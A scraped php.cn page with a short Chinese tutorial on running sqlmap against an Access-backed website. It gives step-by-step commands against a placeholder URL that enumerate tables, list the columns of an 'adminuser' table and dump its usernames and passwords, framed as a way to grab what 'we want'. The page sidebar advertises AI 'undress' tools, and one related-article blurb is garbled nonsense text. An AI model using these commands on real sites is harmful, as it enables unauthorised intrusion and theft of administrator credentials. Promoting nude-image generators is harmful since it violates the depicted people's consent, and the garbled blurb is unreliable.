sqlmap注入Access-Mysql Tutorial-php.cn

Home

Database

Mysql Tutorial

sqlmap注入Access

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 03:05 PM

access sql sqlmap What attack injection

什么是SQL 注入攻击? SQL 注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的

什么是SQL注入攻击?
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员
也越来越多。但是由于程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合
法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的
数据，这就是所谓的SQL Injection，即SQL注入。

什么是SQLMap?
SqlMap是一个开放源码的渗透测试工具，它可以自动探测和利用SQL注入漏洞和接管数据库服务器的过程。它通过了一个强
大的检测引擎，最终渗透测试和广泛的从数据库中的指纹持久的开关，对从数据库中提取数据，访问底层的文件系统和操作
系统执行命令的许多利基功能带外连接。
项目网站：http://sqlmap.sourceforge.net/
支持的数据库：MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB

看到了吧，几乎囊括了市面上所有的数据库
下载：http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz  最新版本 0.9

安装
sqlmap使用Python编写，解压之后直接使用
tar zxvf sqlmap-0.9.tar.gz
cd sqlmap-0.9/
运行
python sqlmap.py
or
chmod +x sqlmap.py
./sqlmap.py
帮助
python sqlmap.py -h
选项比较多
看不下去的童鞋可以先移步这里

网上几乎就只能看到帮助、说明的之类的，实例太少了，希望大家都踊跃发言，一起研究。

针对Access数据库一般就只能爆表，爆数据了(为避免不必要的麻烦，URL用www.xxx.com代替，你懂的)

./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --table  -u "你要注入的URL" --table 爆表

中间会出来一个让你输入线程的问号你输入一个数字 5  ==都可以
它就会开始跑表了

跑出来这么几个表，聪明的童鞋一看就知道那个表会有我们想要的东西

下面开始爆指定表的列名，这里爆adminuser
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --columns -T amdinuser

已经出来了，你可以使用Ctrl+C停止，也可以耐心的再等等

爆数据吧
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --dump -T adminuser -C username,password
一会儿结果就出了

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to fix KB5055523 fails to install in Windows 11?

4 weeks ago By DDD

How to fix KB5055518 fails to install in Windows 10?

4 weeks ago By DDD

Roblox: Grow A Garden - Complete Mutation Guide

3 weeks ago By DDD

Roblox: Bubble Gum Simulator Infinity - How To Get And Use Royal Keys

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

How to fix KB5055612 fails to install in Windows 10?

3 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Java Tutorial

1664

CakePHP Tutorial

1423

Laravel Tutorial

1317

PHP Tutorial

1268

C# Tutorial

1246

Related knowledge

How to configure zend for apache Apr 13, 2025 pm 12:57 PM

How to configure Zend in Apache? The steps to configure Zend Framework in an Apache Web Server are as follows: Install Zend Framework and extract it into the Web Server directory. Create a .htaccess file. Create the Zend application directory and add the index.php file. Configure the Zend application (application.ini). Restart the Apache Web server.

Using Dicr/Yii2-Google to integrate Google API in YII2 Apr 18, 2025 am 11:54 AM

VprocesserazrabotkiveB-enclosed, Мнепришлостольностьсясзадачейтерациигооглапидляпапакробоглесхетсigootrive. LEAVALLYSUMBALLANCEFRIABLANCEFAUMDOPTOMATIFICATION, ČtookazaLovnetakProsto, Kakaožidal.Posenesko

How to identify malicious access in Debian Apache logs Apr 13, 2025 am 07:30 AM

Effective monitoring and defense against malicious website access is crucial to the Apache server on the Debian system. Apache access logs are the key source of information to identify such threats. This article will guide you on how to analyze logs and take defensive measures. The Apache access log that identifies malicious access behaviors Debian systems is usually located in /var/log/apache2/access.log. You can analyze the logs in a variety of ways: Log file location confirmation: First, please confirm the exact location of your Apache access log, which may vary slightly depending on the system configuration. Command line tool analysis: Use grep command to search for specific patterns, such as grep "404"

How to solve nginx current limit Apr 14, 2025 pm 12:06 PM

The Nginx current limit problem can be solved by: use ngx_http_limit_req_module to limit the number of requests; use ngx_http_limit_conn_module to limit the number of connections; use third-party modules (ngx_http_limit_connections_module, ngx_http_limit_rate_module, ngx_http_access_module) to implement more current limit policies; use cloud services (Cloudflare, Google Cloud Rate Limiting, AWS WAF) to DD

What is apache server? What is apache server for? Apr 13, 2025 am 11:57 AM

Apache server is a powerful web server software that acts as a bridge between browsers and website servers. 1. It handles HTTP requests and returns web page content based on requests; 2. Modular design allows extended functions, such as support for SSL encryption and dynamic web pages; 3. Configuration files (such as virtual host configurations) need to be carefully set to avoid security vulnerabilities, and optimize performance parameters, such as thread count and timeout time, in order to build high-performance and secure web applications.

How to use Debian Apache logs to improve website performance Apr 12, 2025 pm 11:36 PM

This article will explain how to improve website performance by analyzing Apache logs under the Debian system. 1. Log Analysis Basics Apache log records the detailed information of all HTTP requests, including IP address, timestamp, request URL, HTTP method and response code. In Debian systems, these logs are usually located in the /var/log/apache2/access.log and /var/log/apache2/error.log directories. Understanding the log structure is the first step in effective analysis. 2. Log analysis tool You can use a variety of tools to analyze Apache logs: Command line tools: grep, awk, sed and other command line tools.

Nginx performance monitoring and troubleshooting tools Apr 13, 2025 pm 10:00 PM

Nginx performance monitoring and troubleshooting are mainly carried out through the following steps: 1. Use nginx-V to view version information, and enable the stub_status module to monitor the number of active connections, requests and cache hit rate; 2. Use top command to monitor system resource occupation, iostat and vmstat monitor disk I/O and memory usage respectively; 3. Use tcpdump to capture packets to analyze network traffic and troubleshoot network connection problems; 4. Properly configure the number of worker processes to avoid insufficient concurrent processing capabilities or excessive process context switching overhead; 5. Correctly configure Nginx cache to avoid improper cache size settings; 6. By analyzing Nginx logs, such as using awk and grep commands or ELK

The Purpose of SQL: Interacting with MySQL Databases Apr 18, 2025 am 12:12 AM

SQL is used to interact with MySQL database to realize data addition, deletion, modification, inspection and database design. 1) SQL performs data operations through SELECT, INSERT, UPDATE, DELETE statements; 2) Use CREATE, ALTER, DROP statements for database design and management; 3) Complex queries and data analysis are implemented through SQL to improve business decision-making efficiency.

See all articles